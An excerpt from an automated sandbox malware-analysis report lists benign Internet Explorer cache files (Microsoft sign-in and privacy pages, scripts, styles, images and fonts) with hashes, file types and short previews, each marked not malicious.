Preview: wOFF......Wh.......|........................OS/2...X...H...`JZ.:VDMX.............^.qcmap............R..cvt ....... ...*....fpgm...........Y...gasp................glyf......G-..{2D.;.head..N....2...6....hhea..O........$$..|hmtx..O(.........yM.loca..O....~...~@l!.maxp..Qp... ... .Q..name..Q....6....`..Upost..V........ .Q.wprep..V.........x...x.c`..g......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...d.Xx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...]L.a...._9u.._...=T.a..B.1..G.n|..f.....a..D4...L...*5..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Size (bytes): 262788

Entropy (8bit): 4.719009857910025

Encrypted: false

MD5: 3850E04FBF51070B1AE70482472A8998

SHA1: 5136F76A01B24FE8D887CB5E4AE4D6490456811C

SHA-256: D20B8DF276BB85BC6D8D58F0BF2724B761C162B91428F4FBB3A3E14E748A4E26

Copyright Joe Security LLC 2019 Page 26 of 47

SHA-512: 60E6418E613BBDC361DACC689DF108CFD31B214215EDD9CE8804497AFAD872FDA1ACBB6ED033173EABA888E82BF737A619923F9CF0245C76CEE7363788E17AFA

Malicious: false

Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\reprocess[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 16399

Entropy (8bit): 5.53187594715885

Encrypted: false

MD5: 39ACCF5CA385E64C9F9EAE801DF34CAF

SHA1: 1F6EFA75F54F5A08E18FDC4C5F122EE725916932

SHA-256: 9D7213DFAA186B9D7620B57151FE3BE007678AEC0DAC0D24205448B83F300279

SHA-512: FF1CE433DB26D9079E05CE28ED35FEC482920D22F1CC16B44EB1094689D421C026E932501C378D2E3C6BD1D48F8407DA75225459963F4A9D99808612D422C6A7

Malicious: false

Preview: ....<!DOCTYPE html>..<html dir="ltr" class="" lang="en">..<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. .. <meta name="PageID" content="ConvergedError" />.. <meta name="SiteID" content="" />.. <meta name="ReqLC" content="1033" />.. <meta name="LocLC" content="en-US" />.. <noscript>.. <meta http-equiv="Refresh" content="0; URL=" />.. </noscript>.... .. <link rel="shortcut icon" href="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />.. .. <meta name="robots" content="none" />....<script type="text/javascript">//<![CDATA[.$Config={"strHeaderText":"Sign in","uns

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\style[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 816

Entropy (8bit): 4.949897846622861

Encrypted: false

MD5: 853BD04891E53E62DCC5EB93DC2D895E

SHA1: 7A77B42B76C1DCA1A526273E7A18738020E0290B

SHA-256: 26F6807B674D6A4CAAEDA21C3E3A5DAF0A018828FF045026B6306E9414EE0E47

SHA-512: FEEA2A298EB9B6EDD0CF5DC3D6473B9F280409147E4722D87C898ACC344566543CCDE986EA1CDBF717EEFF943147C8BC03C7FCF86A386EA4D62211A1E55B0D93

Malicious: false

Preview: body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid{max-width:1600px !important}.js-global-head .c-uhfh-gcontainer button.glyph-global-nav-button{display:none}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with CRLF, LF line terminators

Size (bytes): 306089

Entropy (8bit): 5.466321305176346

Encrypted: false

MD5: 1AF095F9F7CAE6E78993BFBCCEC6667C

SHA1: CE3DE4032609A71B606AF35117D869C8DE0B80D8

SHA-256: E187E07E550C6C4204CFD912A23199C55BCF30FA76D20AB58ECDF2CD75CA5BCD

SHA-512: 11EB56F41CD094A7FFE5CCE756741148914C11E5C1EEDDF9CAE4DE960C8830D621AF201187F5BD8056152766B76EA30A298C0467F135205968A93934BFBAC6AD

Malicious: false

Preview: /*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------.. * .. * This file is based on or incorporates material from the projectslisted below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise... * .. * json2.js (2016-05-01).. * https://github.com/douglascrockford/JSON-js.. * License: Public Domain.. * .. * Provided for Informational Purposes Only.. * .. * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.!function(e){function t(n){if(i[n])return i[n].exports;var a=i[n]=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x28, frames 3

Size (bytes): 101292

Entropy (8bit): 7.8172319338881335

Encrypted: false

Copyright Joe Security LLC 2019 Page 27 of 47

MD5: D365F16C9A53DD752036CD8FB2591EEB

SHA1: 02C216E6A002834ADA9FBEEEE1401E7844587A03

SHA-256: 0DB3C3AD031F72C1404D7B7613971547299E27AD1B70FAABBB972E799EF01206

SHA-512: 1E6145EF39C72830CE7D483B88F6B5A183994044E2901729263614913A618D9396A3C6F893413D911B3FFA8AA565DEED3FBD297E7FF43F9561D94F673FC72015

Malicious: false

Preview: ......JFIF.....H.H.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 267298

Entropy (8bit): 7.984423733048217

Encrypted: false

MD5: 03A70BDE53DD775BF2798438F52E430A

SHA1: 37942898606FC0B94BF810181C03A11FC4483250

SHA-256: D6CF9E1F9EE42A9E3F00C701EBC4B39458402376E5D0EFE616F3E8C0E55A6FD4

SHA-512: 7E2247A421B8A7F2E2463D9627881DCAC95F95C32180041BF85E63F4A13807FBCF8897FCFCAFD1C7270D90BD56FFCA4635380E42E4A8BC642DA9F9755EB79A8A

Malicious: false

Preview: ...7d........x...(..^Wxo...d.xp(}.7ba.....^K....&LX..d..../%.a....W...@.....&...F...7d..Z......u..`.]xo(2..`.2...#..~...8.C.K....^M.qb..v.L....&.X..%..-.....d...Z.X.C^L.qb...L.Z.&L....^L5......V[!0....d.L..b.Ll.a.4..0........2..3h.....L.FI......&PL.2`.&L...&.2d...&..)/..b1H.;.....f....y..#2.C.`..%d.TM.%....X...X9.g.Z..rd.X.K.x/.Z.../.(k.x./.Z..n.......&..J..1b.y/.&,Pwd...(m.w.K.x.C..O.%.X....K..J..^-.Yhk.c..^,P./..Y(;.^-..=.[..(k..v...L...b.....n.d.....-...o...C.....-.y/..^,P..7d.....vM.P./..^,P....^,P...o........[%.Qe.vM...o..vM....n..%...K...C.K..%.P..v%.J..n9]..7`.x7`P.n..d.C..y].({.x.......K.x.G....2X..4Yc%.K.x....K.y.=....>./%..^..^L..vM.]....weW..R..7ew...7a..K.K7d.y/..vM.]..vM.U.P-.~U..@.~..]..7..r..x.Y.&.K.x..o.*.7....o......7...c%.f..|....[..........~M...%...w.w..@.~M.].P,.~Wc%....~Wy7...h....@..1D-.rx.].QK|L>&Uxq@.....W.........).x....|\.v..@.....[.M..........o....la..].).d..]...NSc%......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0_a5dbd4393ff6a725c7e62b61df7e72f0[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 185065

Entropy (8bit): 7.980943347042259

Encrypted: false

MD5: 46FEA73CD8377663DF7A840E9DEBF599

SHA1: 1FC10AD6A21A92C95C19A96878BD7BACC89EACFE

SHA-256: F38E56F2352DE13B5DFEBD579BD2DE87B81B61CB5DE6CB717DF65169D828D065

SHA-512: 82C92CE9F1ADAF7C0F06B06810BEF828600ECD392E25C1743A564545A91BBFD443512B89DE26966C0F31A331B4C865D778CA702AA8A897246C134E57EC01E902

Malicious: false

Preview: 1dRA.c..U.F.Gh7xj...g..tS.RP.27.O... b$(.BHO7Co..!A.o....=....L..)2....>....to$..b-..0a.O.f.(....W.^..D..>.V,..........g=iE%}=A&s...GP.W...p.."......lG.@<....?S.F.X...Tx.H|P.._"...h:g..N?..J.S"..=.[oP.....t...zC...Y.2..(......[a..f}&...HX..#.@.K.cC....B.............}9..&../.XJ.j..s.8..9..7...<.......oq...f.!.Q...U.Y.X..V....pf.0H.v....[>...,......)......]>.I..'..6uE.E..9..vn..|D......U..AA.iC...z...L...i^y...~.......Q.q^i.......!.....h.yU.(........M...#[.n.F.E...VBG.C......b..:G.2.4m......w.nW...:t..9.wPe...?.t.B.x.l.123Yq..........zU...vY....O,.?....]@$..O7N.+..T.q...@lro.+..v..}.?...B.h.7..r..E.....y.Z...u..Q.q.LR&.S.pP...N..[.~..B.....$).v........)3|F(.G.k.)x....X~W.4..Y&..h.5-R.....nmy..9.m...w@..55......P..y...3w.u)..4....r....j%a.}.}......W.r1.n........<....uuZ.........O,L.6..L..w`Y#...l.r..m&....4....`.jo/.Ls.G....[hB...w}....@.9..._...t.&..~........1...#........X..T4.....-..[..TM,.,`.HN.[.......v'Nw8.|r~P.z.Y..\:}f.P.8.O..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\NewErrorPageTemplate[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1612

Entropy (8bit): 4.869554560514657

Encrypted: false

MD5: DFEABDE84792228093A5A270352395B6

SHA1: E41258C9576721025926326F76063C2305586F76

SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075

SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD

Malicious: false

Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].pngProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced

Size (bytes): 4054

Entropy (8bit): 7.797012573497454

Encrypted: false

Copyright Joe Security LLC 2019 Page 28 of 47

MD5: 9F14C20150A003D7CE4DE57C298F0FBA

SHA1: DAA53CF17CC45878A1B153F3C3BF47DC9669D78F

SHA-256: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960

SHA-512: D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487

Malicious: false

Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 96088

Entropy (8bit): 5.290692297364742

Encrypted: false

MD5: 7B634B9A5338663077D64B7E15859ADD

SHA1: 971C4049EA8572EF67426E929676B6C6402782DD

SHA-256: 0581D38458F25293B820B01FE058C1DAF8B2365CE6198BB43EC95385B4ECDD79

SHA-512: FF5D0696D2523D61915CFDFAB0F7DCF8562FA42E2731E1D79E62F32D82760D48A0CC466A5742795ED8F8A53C6A2AF140CE734A16929A176B4562C5FB97F1C8A7

Malicious: false

Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. ..//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\errorPageStrings[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 4720

Entropy (8bit): 5.164796203267696

Encrypted: false

MD5: D65EC06F21C379C87040B83CC1ABAC6B

SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B

SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F

SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E

Malicious: false

Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\favicon[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Copyright Joe Security LLC 2019 Page 29 of 47

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 12105

Entropy (8bit): 5.451485481468043

Encrypted: false

MD5: 9234071287E637F85D721463C488704C

SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152

SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649

SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384

Malicious: false

Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\icons[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), icons family

Size (bytes): 18519

Entropy (8bit): 7.668180326917825

Encrypted: false

MD5: C443B409CE8632A587760F940862748F

SHA1: B1A8B7B8B6B1D4A436B36598D4BD73936BABD639

SHA-256: 39C39A6744CF958E497D3D0A2120F4A7BC0124359231C39E4EDF2387146B0F05

SHA-512: F1593347AC31D6D3B4F904341090B50FE6783F95A4FF2BFED5A96660F4DEF2BBE30DBE3D5EB9EE1DD0D603CFF73E219698B49F1FF35F8228F5B6F34F3C8259BF

Malicious: false

Preview: $.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/2@.Mn...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............|.......|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\latest[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 20916

Entropy (8bit): 7.972782105593206

Encrypted: false

MD5: 1BB0A7EC21A09DA6473E9423345D6FEB

SHA1: 71FF957FBB5A00BF417573C1EC51CB20E89DBF4B

SHA-256: 095C35B21BB3328173E2E6BFF0772CD25488820C7FD3505915D19858E31D60F7

SHA-512: 4E436297FFF3E18E0190DD8457418999327D94CC50328EE9889460FC2F58DEA7E34A89FD796F84A6604066EB8BC14437DDF5689D6947651889CB2A472ABEE01A

Malicious: false

Preview: R...F...._..".)..2..#.\IDj*..z"..*%..#.M........<!....w.$.?.<3'...\.......5$6)O.2.r.K7............s..p...c@.)8.B.9i..<.].....v....:}.....ej.N..c..G.2.4W..0Z..!../Z....@.B2B?.....B8-..&..t%....<TB..N.........IQ...R.....L....>.y..{E:0lB+NA.3aF.......#|..!..9..\;....M....[0XI...2.Y.8.K.E...K.-.....?.t>...!%$.Q.......b<...\K#.......DK.....mS...[...<.....".I....W..$."...)..wh..Cr.ch...+.....Cc.n..6....-T.r.{......E....J......A.t......N.........T.J..F.R...@.f .g..q.P.pW..'.9.*..|!.A.n...D<.....h9p......*..l..I....o<.6....x.1....6..F..ce.*a]..B.5..d0..fP..6"..|v.ff^.=.,./..@..=...D.. .././v....$f[..?....p .G.S.......d.n.%.[...-&.*.E..j.-..G....f.....Y.Q.n...`.;..U.L......{\5@\.I..F....".Bv.m......H.X.......~. ...Y.....[.r.$L...7.B6...+-.3!..aZkh...}.n.9...e.7..F..F"....~.......QH}..)E../d.Z..X...%....Y.I5l8_..."b....,q.pd.........].#?.qmy...........*..v64...)j..6.\..%.$....E]..`.....z..J....F.m$Y.....6.....p.,,....|....R&L]..WB.q..<.|>.uN..MR.87

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 5842

Entropy (8bit): 5.270910508242207

Encrypted: false

MD5: F63DE116518C387CE1B74E2AFEDF1D39

SHA1: E62100D00AC32F5C078E49CB1E3E744310FBEE9C

SHA-256: 2D61BD15CBF2528D2CECB823946C092DDA370E2D41EE68A888E0323E1DAFDF7A

SHA-512: 40FBF92B222C41ABC52D58DA755E2C43673DA501228FD61E1EB0267FFB8930BDBD1355E7527D6FBCEA8971CED999A04BF89727AB1758961B7FFD06490CE8B759

Malicious: false

Preview: function registerNamespace(){for(var e=arguments.length,t=0;e>t;t++){for(var r=this,o=arguments[t].split("."),n=o.length,a=0;n>a;a++){var i=o[a];r[i]||(r[i]=function(){}),r=r[i]}}}!function(){function e(e,o,n,a,i){var s=this,f=null,l=null,c=!1;try{f=t.external}catch(u){}try{l=t.webkit&&t.webkit.messageHandlers||null,c=null!==l}catch(u){}s.getPropertyBag=function(){if(a){if(i&&"undefined"!=typeof Storage&&"undefined"!=typeof JSON&&sessionStorage.property){return JSON.parse(sessionStorage.property)}var e=s.getCookieValue("Property");.if(e&&"undefined"!=typeof JSON){return JSON.parse(e)}}return null},s.getProperty=function(e){var t=null;try{t=f.Property(e)}catch(r){if(a){var o=s.getPropertyBag();o&&(t=o[e],t="string"==typeof t?decodeURIComponent(t):t)}}return t},s.setWizardButtons=function(t,r,o){try{if(!e){if(c){var n={"IsBackEnabled":t,"IsNextEnabled":r,"IsLastPage":o};l.SetWizardButtons.postMessage(JSON.stringify(n))}else{f.SetWizardButtons(t,r,o)}}}catch(i){a&&(s.setCookieValue("Page"

Copyright Joe Security LLC 2019 Page 30 of 47

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 3651

Entropy (8bit): 4.094801914706141

Encrypted: false

MD5: EE5C8D9FB6248C938FD0DC19370E90BD

SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4

SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A

SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58

Malicious: false

